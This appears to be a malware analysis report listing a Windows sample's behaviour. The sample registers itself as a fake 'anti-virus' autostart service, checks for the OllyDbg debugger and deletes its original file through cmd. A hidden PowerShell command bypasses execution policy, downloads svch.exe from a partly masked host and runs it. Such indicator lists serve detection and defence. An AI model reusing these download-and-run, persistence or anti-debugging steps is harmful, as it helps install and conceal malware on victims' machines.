Technical Information
- [<HKLM>\System\CurrentControlSet\Services\anti-virus] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\anti-virus] 'ImagePath' = '%ProgramFiles(x86)%\module.pif'
- 'anti-virus' %ProgramFiles(x86)%\module.pif
- http://ha###.502ok.com/hm as c:/windows/inf/svch.exe
- ClassName: 'OLLYDBG', WindowName: ''
- %ProgramFiles(x86)%\module.pif
- 'localhost':8000
- DNS ASK ha###.502ok.com
- '%ProgramFiles(x86)%\module.pif'
- '%ProgramFiles(x86)%\module.pif' Win7
- '%WINDIR%\syswow64\cmd.exe' /c del <Full path to file> > nul (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del <Full path to file> > nul
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://ha###.502ok.com/hm','C:/WINDOWS/inf/svch.exe');start-process C:/W...